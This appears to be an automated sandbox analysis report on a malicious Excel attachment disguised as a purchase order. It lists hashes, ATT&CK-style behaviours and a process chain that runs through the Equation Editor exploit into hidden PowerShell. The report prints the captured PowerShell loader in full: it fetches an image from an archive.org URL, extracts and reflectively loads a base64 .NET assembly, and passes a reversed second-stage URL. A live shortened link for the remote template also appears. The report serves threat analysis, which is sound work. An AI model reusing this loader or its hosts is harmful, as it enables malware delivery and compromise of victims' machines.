Analysis
-
max time kernel
118s
-
max time network
119s
-
platform
windows7_x64
-
resource
win7-20240705-en
-
resource tags
arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
-
submitted
23/08/2024, 05:22
Static task
static1
Behavioral task
behavioral1
Sample
PURCHASE ORDER.xla.xls
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
PURCHASE ORDER.xla.xls
Resource
win10v2004-20240802-en
General
-
Target
PURCHASE ORDER.xla.xls
-
Size
563KB
-
MD5
e21676432efe61e7e8f26ad8433a4eda
-
SHA1
b6437eb2b197d96e39f4e3ba6821b94fd2cde851
-
SHA256
451623c17212a8eb8a15d5f76032cd55e622ebf4dc6327c8d6f9fca6de3f20b9
-
SHA512
a759bb28537dc0afb3779878d88a9999f8bc3d8134e53e32e79cee03c6e3b6ce21eb3a2013e3d2cf2647370520243f2ca8640199e7ec38ee9eaa0086aa5d38a7
-
SSDEEP
12288:f0qB4ppth4pvp1KtyQEOgpd0fPkPPFY984UDWtzGdst0UkK7ioP:fGLth8p1sJgpaP6kYDWV/0HM
Malware Config
Extracted
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Signatures
-
Blocklisted process makes network request 3 IoCs
flow | pid | Process
26 | 1868 | EQNEDT32.EXE
28 | 1424 | powershell.exe
29 | 1424 | powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Runs PowerShell and hides the display window.
pid | Process
564 | powershell.exe
1424 | powershell.exe
-
Abuses OpenXML format to download file from external location 2 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EXCEL.EXE
Key opened | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Office\Common\Offline\Files\https://kutt.uk/dE00zz | WINWORD.EXE
-
Drops file in System32 directory 2 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EQNEDT32.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid | Process
1868 | EQNEDT32.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
2088 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
564 | powershell.exe
1424 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 564 | powershell.exe
Token: SeDebugPrivilege | 1424 | powershell.exe
Token: SeShutdownPrivilege | 2820 | WINWORD.EXE
-
Suspicious use of SetWindowsHookEx 8 IoCs
pid | Process
2088 | EXCEL.EXE
2088 | EXCEL.EXE
2088 | EXCEL.EXE
2820 | WINWORD.EXE
2820 | WINWORD.EXE
2088 | EXCEL.EXE
2088 | EXCEL.EXE
2088 | EXCEL.EXE
-
Suspicious use of WriteProcessMemory 16 IoCs
description | pid | Process | procid_target
PID 2820 wrote to memory of 2320 | 2820 | WINWORD.EXE | 33
PID 2820 wrote to memory of 2320 | 2820 | WINWORD.EXE | 33
PID 2820 wrote to memory of 2320 | 2820 | WINWORD.EXE | 33
PID 2820 wrote to memory of 2320 | 2820 | WINWORD.EXE | 33
PID 1868 wrote to memory of 2304 | 1868 | EQNEDT32.EXE | 35
PID 1868 wrote to memory of 2304 | 1868 | EQNEDT32.EXE | 35
PID 1868 wrote to memory of 2304 | 1868 | EQNEDT32.EXE | 35
PID 1868 wrote to memory of 2304 | 1868 | EQNEDT32.EXE | 35
PID 2304 wrote to memory of 564 | 2304 | WScript.exe | 36
PID 2304 wrote to memory of 564 | 2304 | WScript.exe | 36
PID 2304 wrote to memory of 564 | 2304 | WScript.exe | 36
PID 2304 wrote to memory of 564 | 2304 | WScript.exe | 36
PID 564 wrote to memory of 1424 | 564 | powershell.exe | 38
PID 564 wrote to memory of 1424 | 564 | powershell.exe | 38
PID 564 wrote to memory of 1424 | 564 | powershell.exe | 38
PID 564 wrote to memory of 1424 | 564 | powershell.exe | 38
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.xla.xls" 1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2088
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding 1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2820
-
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288 2⤵
PID:2320
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding 1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1868
-
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\weneedgoodcakewithbuttermilksw.vBS" 2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2304
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload string removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⥼ ⫣ ᭣ ₊ ⤪','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD 3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:564
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RCNK/RNK/ppmax/522.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" 4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize 192B
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B7A69FF474CB55CBBEC817CB4508128
Filesize 540B
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2791B13D-2E16-448C-A3DC-84796B12E9F5}.FSD
Filesize 128KB
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize 128KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M7GT0RRO\yummycreamwithgoodchocolatemilkcreamaddedformakethebuttersmoothbunwhicheatedoncenevertellasneedbecauseitsverycutetobutter_____milkycream[1].doc
Filesize 82KB
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize 7KB